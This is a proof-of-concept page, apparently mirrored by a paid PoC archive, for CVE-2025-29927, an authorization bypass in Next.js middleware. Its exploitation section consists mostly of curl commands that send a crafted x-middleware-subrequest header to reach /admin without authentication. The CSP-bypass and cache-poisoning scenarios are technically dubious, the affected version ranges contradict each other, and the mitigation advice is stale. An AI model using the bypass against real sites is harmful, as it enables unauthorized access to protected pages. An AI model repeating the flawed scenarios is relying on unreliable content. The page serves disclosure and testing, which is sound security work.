Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/Eve-SatOrU/POC-CVE-2025-29927
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
CVE-2025-29927 Proof of Concept
Readme
# CVE-2025-29927: Next.js Middleware Bypass PoC
## Overview
This PoC demonstrates CVE-2025-29927, a vulnerability in Next.js middleware that allows attackers to bypass authentication, authorization, and CSP mechanisms using the x-middleware-subrequest header.

## Affected Versions
Next.js versions 11.1.4 to 15.1.7

## Setup & Installation
1️⃣ Clone & Install the PoC
```sh
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev
```

The app will start on http://localhost:3000

## Exploitation Scenarios
### 1️⃣ Bypass Authentication & Authorization (cURL)
1- Use x-middleware-subrequest to gain unauthorized access:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```
💥 Expected result: The response returns admin admin, even though authentication was bypassed.

<!-- put screenshot.png -->
![result screenshot](assets/Screenshot.png)

### 2️⃣ CSP Bypass for XSS Injection
If CSP is enforced via middleware, bypass it:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin
```
💥 Expected result: The CSP is ignored, allowing malicious script execution.

### 3️⃣ Cache-Poisoning DoS (CPDoS) Attack
Exploit cache poisoning by forcing a malformed response:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin
```
💥 Expected result: The page is cached with incorrect content, disrupting normal users.

## Mitigation Strategies
- ✅ Validate middleware logic to prevent bypass . 
- ✅ Upgrade Next.js once a patched version is released .

## Credits
🔍 Discovered by: Allam Rachid (zhero;) & Allam Yasser (inzo_)
File Snapshot

 [4.0K]  /data/pocs/73eea93de8517aa563115e468b62c51016be11e4
├── [4.0K]  assets
│   └── [109K]  Screenshot.png
├── [4.0K]  Demo
│   └── [4.0K]  my-next-app
└── [1.9K]  README.md

3 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →